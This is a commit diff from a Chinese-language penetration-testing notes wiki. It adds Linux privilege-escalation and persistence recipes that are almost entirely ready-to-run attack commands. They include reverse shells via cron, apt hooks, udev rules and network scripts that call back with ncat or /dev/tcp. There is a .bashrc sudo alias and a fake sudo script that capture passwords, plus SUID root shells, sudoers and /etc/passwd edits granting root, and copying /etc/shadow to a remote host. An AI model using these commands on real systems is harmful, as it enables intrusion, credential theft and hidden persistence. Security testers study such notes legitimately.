Skip to content

Commit 30a77c7

Browse files
committed
update
1 parent 50acc9e commit 30a77c7

18 files changed

+119
-10
lines changed

wiki/README.md

+6-1
Original file line numberDiff line numberDiff line change
@@ -169,7 +169,7 @@
169169
- [Linux-Exploit-Suggester](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/Linux-Exploit-Suggester.md)
170170
- [一些检测工具](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/一些检测工具.md)
171171
- [Linux计划任务](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/Linux计划任务.md)
172-
- [passwd文件提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/passwd文件提权.md)
172+
- [可写文件提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/可写文件提权.md)
173173
- [Sudo提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/Sudo提权.md)
174174
- [Linux SUID提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/LinuxSUID提权.md)
175175
- [漏洞提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/漏洞提权.md)
@@ -515,6 +515,11 @@
515515
- [SSH wrapper后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/SSH-wrapper后门.md)
516516
- [Strace记录ssh密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/Strace记录ssh密码.md)
517517
- [SUID Shell](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/SUID-Shell.md)
518+
- [apt后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/apt后门.md)
519+
- [bash_rc](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/bash_rc.md)
520+
- [后门驱动程序](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/后门驱动程序.md)
521+
- [启动项服务后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/启动项服务后门.md)
522+
- [用户启动文件](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/用户启动文件.md)
518523
- [web服务&中间件](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/web服务&中间件/README.md)
519524
- [Apache](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/web服务&中间件/Apache.md)
520525
- [IIS](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/web服务&中间件/IIS.md)

wiki/权限提升/Linux提权/Linux计划任务.md

+10
Original file line numberDiff line numberDiff line change
@@ -1,3 +1,13 @@
1+
crontab -l
2+
ls -alh /var/spool/cron;
3+
ls -al /etc/ | grep cron
4+
ls -al /etc/cron*
5+
cat /etc/cron*
6+
cat /etc/at.allow
7+
cat /etc/at.deny
8+
cat /etc/cron.allow
9+
cat /etc/cron.deny*
10+
111
>for user in $(getent passwd|cut -f1 -d:); do echo "### Crontabs for $user ####"; crontab -u $user -l; done 列举所有用户的crontab
212
$cat /etc/crontab
313
$echo 'echo "ignite ALL=(root) NOPASSWD: ALL" > /etc/sudoers' >test.sh

wiki/权限提升/Linux提权/README.md

+1-1
Original file line numberDiff line numberDiff line change
@@ -3,7 +3,7 @@
33
- [Linux-Exploit-Suggester](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/Linux-Exploit-Suggester.md)
44
- [一些检测工具](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/一些检测工具.md)
55
- [Linux计划任务](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/Linux计划任务.md)
6-
- [passwd文件提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/passwd文件提权.md)
6+
- [可写文件提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/可写文件提权.md)
77
- [Sudo提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/Sudo提权.md)
88
- [Linux SUID提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/LinuxSUID提权.md)
99
- [漏洞提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/漏洞提权.md)

wiki/权限提升/Linux提权/Sudo提权.md

+6-1
Original file line numberDiff line numberDiff line change
@@ -31,4 +31,9 @@
3131
>id
3232
>whoami
3333
>sudo socat exec:'sh -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.105:1234
34-
>sudo scp /etc/shadow aarti@192.168.1.105:~/
34+
>sudo scp /etc/shadow aarti@192.168.1.105:~/
35+
36+
工具
37+
https://github.com/TH3xACE/SUDO_KILLER
38+
sudo_inject
39+
https://github.com/nongiach/sudo_inject

wiki/权限提升/Linux提权/一些检测工具.md

+7-1
Original file line numberDiff line numberDiff line change
@@ -3,4 +3,10 @@
33
枚举基本系统信息并搜索常见的权限提升向量,例如世界可写文件、错误配置、明文密码和适用的漏洞利用
44
http://www.securitysift.com/download/linuxprivchecker.py
55
检查文件权限、cron 作业(如果可见)、弱凭据等
6-
https://github.com/rebootuser/LinEnum
6+
https://github.com/rebootuser/LinEnum
7+
提权脚本
8+
https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
9+
枚举工具
10+
https://github.com/diego-treitos/linux-smart-enumeration
11+
https://github.com/AlessandroZ/BeRoot
12+
https://github.com/pentestmonkey/unix-privesc-check

wiki/权限提升/Linux提权/passwd文件提权.md wiki/权限提升/Linux提权/可写文件提权.md

+19-1
Original file line numberDiff line numberDiff line change
@@ -1,3 +1,8 @@
1+
#### 列出系统中可写文件
2+
>find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
3+
>find / -perm -2 -type f 2>/dev/null
4+
>find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
5+
#### passwd文件
16
$ls –lh /etc/passwd 若是任何用户可读写
27
$perl -le 'print crypt("password@123","addedsalt")' 生成密码或php -r "print(crypt('aarti','123') . \"\n\");"或python -c 'import crypt; print crypt.crypt("pass", "$6$salt")'
38
$echo "test:advwtv/9yU5yQ:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd
@@ -11,4 +16,17 @@
1116
>useradd newuser;echo "newuser:password"|chpasswd
1217
>useradd -p `openssl passwd 123456` guest
1318
>useradd -p "$(openssl passwd 123456)" guest
14-
>useradd newuwer;echo -e "123456\n123456\n" |passwd newuser
19+
>useradd newuwer;echo -e "123456\n123456\n" |passwd newuser
20+
#### /etc/sysconfig/network-scripts/
21+
NAME=Network /bin/id <= 注意空格
22+
ONBOOT=yes
23+
DEVICE=eth0
24+
25+
EXEC :
26+
./etc/sysconfig/network-scripts/ifcfg-1337
27+
#### sudoers
28+
echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers
29+
30+
无需密码使用sudo
31+
echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers
32+
echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers

wiki/权限提升/Linux提权/查找可能泄露的密码.md

+2
Original file line numberDiff line numberDiff line change
@@ -8,6 +8,8 @@
88
>cat ~/.atftp_history
99
>cat ~/.mysql_history
1010
>cat ~/.php_history
11+
>grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
12+
>find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
1113
##### 尝试查找私钥
1214
>cat ~/.ssh/authorized_keys
1315
>cat ~/.ssh/identity.pub

wiki/权限提升/Linux提权/通配符提权.md

+4-1
Original file line numberDiff line numberDiff line change
@@ -27,4 +27,7 @@
2727
>root
2828
>find f1 -exec "/bin/sh" \;
2929
>id
30-
>whoami
30+
>whoami
31+
32+
工具
33+
https://github.com/localh0t/wildpwn

wiki/权限提升/README.md

+1-1
Original file line numberDiff line numberDiff line change
@@ -44,7 +44,7 @@
4444
- [Linux-Exploit-Suggester](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/Linux-Exploit-Suggester.md)
4545
- [一些检测工具](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/一些检测工具.md)
4646
- [Linux计划任务](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/Linux计划任务.md)
47-
- [passwd文件提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/passwd文件提权.md)
47+
- [可写文件提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/可写文件提权.md)
4848
- [Sudo提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/Sudo提权.md)
4949
- [Linux SUID提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/LinuxSUID提权.md)
5050
- [漏洞提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/漏洞提权.md)

wiki/权限维持/Linux/Linux-cron后门.md

+3-1
Original file line numberDiff line numberDiff line change
@@ -3,4 +3,6 @@
33
![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/571.png)
44

55
#!bash
6-
(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/192.168.1.1/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -
6+
(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/192.168.1.1/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -
7+
8+
(crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash")|crontab 2> /dev/null

wiki/权限维持/Linux/README.md

+6-1
Original file line numberDiff line numberDiff line change
@@ -9,4 +9,9 @@
99
- [SSH公私钥登录](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/SSH公私钥登录.md)
1010
- [SSH wrapper后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/SSH-wrapper后门.md)
1111
- [Strace记录ssh密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/Strace记录ssh密码.md)
12-
- [SUID Shell](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/SUID-Shell.md)
12+
- [SUID Shell](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/SUID-Shell.md)
13+
- [apt后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/apt后门.md)
14+
- [bash_rc](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/bash_rc.md)
15+
- [后门驱动程序](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/后门驱动程序.md)
16+
- [启动项服务后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/启动项服务后门.md)
17+
- [用户启动文件](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/用户启动文件.md)

wiki/权限维持/Linux/SUID-Shell.md

+8-1
Original file line numberDiff line numberDiff line change
@@ -1,3 +1,10 @@
11
>cp /bin/bash /tmp/tmp
22
>chmod u+s /tmp/tmp
3-
>/tmp/tmp -p
3+
>/tmp/tmp -p
4+
或者
5+
>TMPDIR2="/var/tmp"
6+
>echo 'int main(void){setresuid(0, 0, 0);system("/bin/sh");}' > $TMPDIR2/croissant.c
7+
>gcc $TMPDIR2/croissant.c -o $TMPDIR2/croissant 2>/dev/null
8+
>rm $TMPDIR2/croissant.c
9+
>chown root:root $TMPDIR2/croissant
10+
>chmod 4777 $TMPDIR2/croissant

wiki/权限维持/Linux/apt后门.md

+3
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,3 @@
1+
如果您可以使用以下命令在apt.conf.d目录中创建一个文件:APT::Update::Pre-Invoke {"CMD"}; 下次"apt-get update"完成时,CMD 将被执行!
2+
3+
echo 'APT::Update::Pre-Invoke {"nohup ncat -lvp 1234 -e /bin/bash 2> /dev/null &"};' > /etc/apt/apt.conf.d/42backdoor

wiki/权限维持/Linux/bash_rc.md

+23
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,23 @@
1+
TMPNAME2=".systemd-private-b21245afee3b3274d4b2e2-systemd-timesyncd.service-IgCBE0"
2+
cat << EOF > /tmp/$TMPNAME2
3+
alias sudo='locale=$(locale | grep LANG | cut -d= -f2 | cut -d_ -f1);if [ \$locale = "en" ]; then echo -n "[sudo] password for \$USER: ";fi;if [ \$locale = "fr" ]; then echo -n "[sudo] Mot de passe de \$USER: ";fi;read -s pwd;echo; unalias sudo; echo "\$pwd" | /usr/bin/sudo -S nohup nc -lvp 1234 -e /bin/bash > /dev/null && /usr/bin/sudo -S '
4+
EOF
5+
if [ -f ~/.bashrc ]; then
6+
cat /tmp/$TMPNAME2 >> ~/.bashrc
7+
fi
8+
if [ -f ~/.zshrc ]; then
9+
cat /tmp/$TMPNAME2 >> ~/.zshrc
10+
fi
11+
rm /tmp/$TMPNAME2
12+
13+
或在其 .bashrc 文件中添加以下行。
14+
>chmod u+x ~/.hidden/fakesudo
15+
>echo "alias sudo=~/.hidden/fakesudo" >> ~/.bashrc
16+
创建fakesudo脚本。
17+
read -sp "[sudo] password for $USER: " sudopass
18+
echo ""
19+
sleep 2
20+
echo "Sorry, try again."
21+
echo $sudopass >> /tmp/pass.txt
22+
23+
/usr/bin/sudo $@
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
echo "ACTION==\"add\",ENV{DEVTYPE}==\"usb_device\",SUBSYSTEM==\"usb\",RUN+=\"$RSHELL\"" | tee /etc/udev/rules.d/71-vbox-kernel-drivers.rules > /dev/null
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,2 @@
1+
RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null"
2+
sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,12 @@
1+
写入文件
2+
~/.config/autostart/NAME_OF_FILE.desktop
3+
4+
In : ~/.config/autostart/*.desktop
5+
6+
[Desktop Entry]
7+
Type=Application
8+
Name=Welcome
9+
Exec=/var/lib/gnome-welcome-tour
10+
AutostartCondition=unless-exists ~/.cache/gnome-getting-started-docs/seen-getting-started-guide
11+
OnlyShowIn=GNOME;
12+
X-GNOME-Autostart-enabled=false

wiki/权限维持/README.md

+5
Original file line numberDiff line numberDiff line change
@@ -63,6 +63,11 @@
6363
- [SSH wrapper后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/SSH-wrapper后门.md)
6464
- [Strace记录ssh密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/Strace记录ssh密码.md)
6565
- [SUID Shell](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/SUID-Shell.md)
66+
- [apt后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/apt后门.md)
67+
- [bash_rc](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/bash_rc.md)
68+
- [后门驱动程序](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/后门驱动程序.md)
69+
- [启动项服务后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/启动项服务后门.md)
70+
- [用户启动文件](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/用户启动文件.md)
6671
- [web服务&中间件](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/web服务&中间件/README.md)
6772
- [Apache](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/web服务&中间件/Apache.md)
6873
- [IIS](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/web服务&中间件/IIS.md)

0 commit comments

Comments
 (0)